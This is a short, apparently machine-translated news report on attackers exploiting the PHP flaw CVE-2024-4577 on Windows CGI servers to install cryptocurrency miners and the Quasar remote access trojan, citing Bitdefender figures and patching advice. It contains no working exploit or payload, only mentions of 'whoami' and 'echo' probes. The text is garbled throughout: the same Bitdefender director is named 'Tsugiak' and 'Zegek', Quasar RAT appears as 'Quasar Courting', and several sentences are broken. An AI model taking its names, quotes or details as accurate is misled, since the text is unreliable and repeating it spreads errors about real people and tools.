The actors threatens exploit a serious lack of security in PHP to deliver cryptocurrency miners and remote access (rats) like Quasar Rat.
Vulnerability assigned to CVE ID Cve-2024-4577Refers to argument vulnerability in PHP that affect Windows -based systems that work in CGI, which can allow distant attackers to run an arbitrary code.
Cybersecurity Company Bitdefender – Note Since the end of last year, he observed attempts to operate against the CVE-2024-4577, and a significant concentration was reported in Taiwan (54.65%), Hong Kong (27.06%), Brazil (16.39%), Japan (1.57%) and India (0.33%).
About 15% of the revealed attempts to operate the main inspections of the vulnerability, using teams such as “Whoami” and “Echo
Martin Tsugiak, Director of Technical Decisions in Bitdefender, noted that about 5% of the identified attacks ended in the deployment of the Xmrig cryptocurrency miner.
“Another smaller company provided for the deployment of Nicehash miners, a platform that allows users to sell computing for cryptocurrency,” Zegek added. “The miner process was disguised as a legitimate application, such as Javawindows.exe to avoid detection.”
Other attacks have been found to have been found to arm the shortage of remote access tools such as Quasar Courting, and execute malicious installation files (MSI), located on remote servers using cmd.exe.
The Romanian company may have said that it also observed attempts to change the firewall configuration on vulnerable servers to block access to well -known malicious IPS related exploitation.
Such an unusual behavior has caused the possibility that the rival crypto -group competes for control of susceptible resources and preventing them from focusing on those under their control for the second time. This also matches historic observation As we know, Cryptjacking attacks stop the rivals of the miners before deploying their own useful loads.
Development occurs shortly after cisco talos disclosed Details of the PHP lack of lack of attacks on attacks aimed at Japanese organizations since the beginning of the year.
Users are advised to update their PHP installations to the latest version to protect against potential threats.
“As most companies use Lotl tools, organizations must consider limiting the use of tools such as PowerShell in the environment only privileged users such as administrators,” Tsugiak said.
